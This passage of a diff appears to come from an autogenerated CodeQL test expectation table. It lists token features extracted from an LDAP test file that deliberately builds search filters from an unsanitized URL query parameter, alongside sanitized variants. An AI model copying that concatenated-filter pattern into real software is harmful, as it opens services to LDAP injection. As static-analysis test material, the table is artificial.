enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:21:15:26 | "\\\\00" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:21:15:26 | "\\\\00" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:6:16:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:6:16:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:6:16:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:6:16:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:6:16:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:14:16:18 | /\\//g | CalleeFlexibleAccessPath | input.replace().replace().replace().replace().replace().replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:14:16:18 | /\\//g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:14:16:18 | /\\//g | contextFunctionInterfaces | sanitizeInput(input) | @@ -965,6 +5196,55 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:21:16:26 | "\\\\2f" | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:21:16:26 | "\\\\2f" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:16:21:16:26 | "\\\\2f" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:19:12 | server | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:19:12 | server | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:19:12 | server | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server ... T OK\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:7:69:2 | server ... T OK\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:19 | http | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:19 | http | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:19 | http | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:32 | http.createServer | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:32 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:19:32 | http.createServer | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:16:69:2 | http.cr ... T OK\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:21:19:32 | createServer | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:21:19:32 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:21:19:32 | createServer | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | ldap | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | ldap | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | sanitizeInput | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | sanitizeInput | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | url | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:19:33 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | 'arguments' object of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | calleeImports | http | @@ -972,6 +5252,76 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | (req, r ... OT OK\\n} | receiverName | http | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | exceptional return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:34:69:1 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:35:19:37 | req | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:40:19:42 | res | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:40:19:42 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:40:19:42 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:40:19:42 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:19:40:19:42 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:7 | q | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:7 | q | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:7 | q | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:7 | q | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:7 | q | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q = url ... , true) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q = url ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q = url ... , true) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q = url ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:7:20:34 | q = url ... , true) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:13 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:13 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:13 | url | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:13 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:13 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:19 | url.parse | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:19 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:19 | url.parse | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:19 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:19 | url.parse | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | exceptional return of url.par ... , true) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | exceptional return of url.par ... , true) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | url.par ... , true) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | url.par ... , true) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:11:20:34 | url.par ... , true) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:15:20:19 | parse | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:15:20:19 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:15:20:19 | parse | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:15:20:19 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:15:20:19 | parse | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:23 | req | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:23 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:23 | req | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:23 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:23 | req | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | calleeImports | url | @@ -981,6 +5331,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:21:20:27 | req.url | receiverName | url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:25:20:27 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:25:20:27 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:25:20:27 | url | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:25:20:27 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:25:20:27 | url | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | calleeImports | url | @@ -990,6 +5345,142 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:20:30:20:33 | true | receiverName | url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:14 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:14 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:14 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:14 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:14 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | usernam ... sername | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | usernam ... sername | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | usernam ... sername | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search 